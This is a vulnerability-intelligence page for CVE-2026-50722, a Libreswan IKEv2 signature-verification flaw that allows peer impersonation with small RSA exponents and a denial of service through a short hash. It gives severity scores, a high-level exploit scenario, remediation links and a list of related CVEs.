Skip to main content

Libreswan EUVDEUVD-2026-41440

| CVE-2026-50722 HIGH
Improper Verification of Cryptographic Signature (CWE-347)
2026-07-02 libreswan GHSA-h4cv-5vw8-2p6m
8.1
CVSS 3.1 · Vendor: libreswan
Share

Severity by source

Vendor (libreswan) PRIMARY
8.1 HIGH
AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
8.1 HIGH

Network-reachable and unauthenticated (PR:N); forgery needs the non-default small-exponent condition, giving AC:H; impersonation yields C:H/I:H and daemon-abort DoS gives A:H.

3.1 AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (libreswan).

CVSS VectorVendor: libreswan

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

5
Analysis Updated
Jul 02, 2026 - 22:30 vuln.today
v3 (cvss_changed)
Analysis Updated
Jul 02, 2026 - 22:29 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jul 02, 2026 - 22:22 vuln.today
cvss_changed
CVSS changed
Jul 02, 2026 - 22:22 NVD
7.5 (HIGH) 8.1 (HIGH)
Analysis Generated
Jul 02, 2026 - 22:16 vuln.today

DescriptionCVE.org

Libreswan, via the function RSA_authenticate_hash_signature_pkcs1_1_5_rsa(), did not correctly verify the DER encoding of the ASN.1 digest when the IKEv2 AUTH payload was encoded using RSASSA-PKCS1-v1_5 (RFC 8017). A remote attacker can use a variation on the Bleichenbacher attack to forge the AUTH payload when small public exponents are used (e.g., e=3), leading to impersonation. Additionally, a remote attacker, by encoding a shorter than expected hash in the AUTH payload, could trigger an assertion leading to denial-of-service. The daemon aborts and restarts; continued exploitation causes sustained denial of service. Remote code execution is not possible. X.509 certificate verifications of the remote IKE peer are not affected.

AnalysisAI

Peer impersonation and denial-of-service in Libreswan IPsec/IKEv2 arises from improper DER/ASN.1 digest verification in RSA_authenticate_hash_signature_pkcs1_1_5_rsa() when the IKEv2 AUTH payload uses RSASSA-PKCS1-v1_5 signatures. A remote unauthenticated attacker can mount a Bleichenbacher-style forgery to impersonate a peer when small RSA public exponents (e.g., e=3) are in use, or send an undersized hash to trip an assertion that aborts and restarts the daemon for sustained DoS. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach IKEv2 listener (UDP/500,4500)
Delivery
Initiate IKE_AUTH exchange
Exploit
Send forged PKCS#1 v1.5 AUTH payload
Execution
Lax DER parser accepts e=3 signature
Persist
Impersonate trusted VPN peer (or short-hash assertion aborts daemon
Impact
DoS)

Vulnerability AssessmentAI

Exploitation For the impersonation/forgery path, the required condition is that the authenticating peer uses IKEv2 AUTH with RSASSA-PKCS1-v1_5 raw RSA signatures AND an RSA key with a small public exponent such as e=3 - this non-default key configuration is the exact prerequisite and the primary limiting factor (modern keys typically use e=65537, which is not vulnerable to the low-exponent forgery). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The NVD CVSS 3.1 score is 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H): network-reachable and unauthenticated (PR:N), but with high attack complexity (AC:H) reflecting the cryptographic conditions and math required. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who can reach the victim's IKEv2 endpoint initiates an IKE_AUTH exchange and submits a forged RSASSA-PKCS1-v1_5 AUTH payload; if the peer key uses a small exponent like e=3, the lax DER parser accepts the crafted signature and the attacker impersonates a trusted peer to establish a VPN tunnel. Alternatively, the attacker repeatedly sends AUTH payloads containing a shorter-than-expected hash, tripping an assertion that aborts the daemon on each attempt for a sustained denial of service. …
Remediation Apply the vendor-released Libreswan patch published at https://libreswan.org/security/CVE-2026-50722/ and detailed in the advisory https://libreswan.org/security/CVE-2026-50722/CVE-2026-50722.txt (upgrade to the fixed release once the exact version is confirmed from that advisory, as the input does not name a specific fix version). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all Libreswan deployments in your infrastructure; document current versions; retrieve the vendor advisory for CVE-2026-50722 to identify the patched version and release date. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-48558 CRITICAL POC
9.5 Jun 12

Authentication bypass in SimpleHelp 5.5.15 and prior (plus 6.0 pre-release builds) allows remote unauthenticated attacke

CVE-2025-59718 CRITICAL
9.8 Dec 09

Authentication bypass in Fortinet FortiOS, FortiProxy, and FortiSwitchManager allows unauthenticated remote attackers to

CVE-2025-25291 CRITICAL POC
9.3 Mar 12

ruby-saml provides security assertion markup language (SAML) single sign-on (SSO) for Ruby. Rated critical severity (CVS

CVE-2025-25292 CRITICAL POC
9.3 Mar 12

ruby-saml provides security assertion markup language (SAML) single sign-on (SSO) for Ruby. Rated critical severity (CVS

CVE-2025-31489 HIGH POC
8.7 Apr 03

MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. Rated high severity (C

CVE-2026-29000 CRITICAL POC
9.3 Mar 04

JWT authentication bypass in pac4j-jwt before 4.5.9/5.7.9/6.3.3 when processing encrypted JWTs. PoC available.

CVE-2026-10795 HIGH POC
8.1 Jun 11

Remote code execution in UpdraftPlus: WP Backup & Migration Plugin for WordPress (versions ≤1.26.4) allows unauthenticat

CVE-2026-28802 HIGH POC
7.7 Mar 06

Authentication bypass in Authlib (Python OAuth/OpenID Connect library) versions 1.6.5 through 1.6.6 allows remote attack

CVE-2026-39829 HIGH POC
7.5 May 22

Denial of service in the Go golang.org/x/crypto/ssh library before version 0.52.0 allows unauthenticated remote attacker

CVE-2026-44748 CRITICAL
9.9 Jun 09

Signed XML message tampering in SAP NetWeaver Application Server ABAP and ABAP Platform allows authenticated low-privile

CVE-2025-59719 CRITICAL
9.8 Dec 09

Authentication bypass in Fortinet FortiWeb 8.0.0, 7.6.0-7.6.4, and 7.4.0-7.4.9 allows unauthenticated remote attackers t

CVE-2025-27670 CRITICAL
9.8 Mar 05

Vasion Print (formerly PrinterLogic) before Virtual Appliance Host 22.0.843 Application 20.0.1923 allows Insufficient Si

Share

EUVD-2026-41440 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy